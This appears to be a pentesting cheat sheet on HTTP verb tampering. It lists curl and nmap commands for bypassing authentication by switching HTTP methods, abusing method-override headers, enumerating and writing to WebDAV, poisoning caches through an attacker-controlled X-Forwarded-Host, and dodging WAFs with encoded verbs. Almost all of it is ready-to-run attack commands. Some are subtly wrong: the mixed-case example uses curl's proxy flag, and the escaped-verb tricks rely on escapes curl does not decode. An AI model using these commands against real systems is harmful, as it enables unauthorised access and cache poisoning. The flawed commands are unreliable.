b0ysie7e

Appearance

HTTP Verb Tampering

Bypassing Basic Authentication

c
curl -X GET http://target.com/restricted
curl -X POST http://target.com/restricted 
curl -X PUT http://target.com/restricted
curl -X DELETE http://target.com/restricted
curl -X OPTIONS http://target.com/restricted
curl -X HEAD http://target.com/restricted
curl -X TRACE http://target.com/restricted

Dangerous Verb Combinations

c
# Bypass with mixed case
curl -x gEt http://target.com/admin

# Null verb tunneling
curl -X "GET /admin HTTP/1.1" http://target.com

# Verb spoofing via headers
curl -H "X-HTTP-Method-Override: PUT" -X POST http://target.com/update

WebDAV-Specific Exploits

c
# PROPFIND to enumerate directories
curl -X PROPFIND http://target.com/webdav/

# MKCOL to create directories
curl -X MKCOL http://target.com/new_folder

# SEARCH for file discovery
curl -X SEARCH -H "Content-Type: text/xml" --data-binary @search.xml http://target.com

Automated Testing with Nmap

c
nmap -p 80,443 --script http-methods,http-auth-finder target.com

Advanced Exploitation Techniques

HTTP Method Override

c
# Using different override headers
curl -H "X-HTTP-Method: DELETE" -X POST http://target.com/resource
curl -H "X-Method-Override: PUT" -X POST http://target.com/upload

JSON API Exploitation

c
# Verb tampering in REST APIs
curl -X GET -H "Content-Type: application/json" http://api.target.com/users \
  -d '{"method":"DELETE","id":123}'

Cache Poisoning Vectors

c
# Using HEAD to poison cache
curl -X HEAD -H "X-Forwarded-Host: attacker.com" http://target.com/static/logo.png

Defensive Bypass Techniques

c
# Bypassing WAFs with verb obfuscation
curl -X "G\u0045T" http://target.com/admin
curl -X "G%45T" http://target.com/admin
curl -X "G\x45T" http://target.com/admin

Detection Payloads

c
# Test for verb tampering vulnerabilities
curl -X "ARBITRARY" http://target.com -I
curl -X "JUNK" http://target.com -I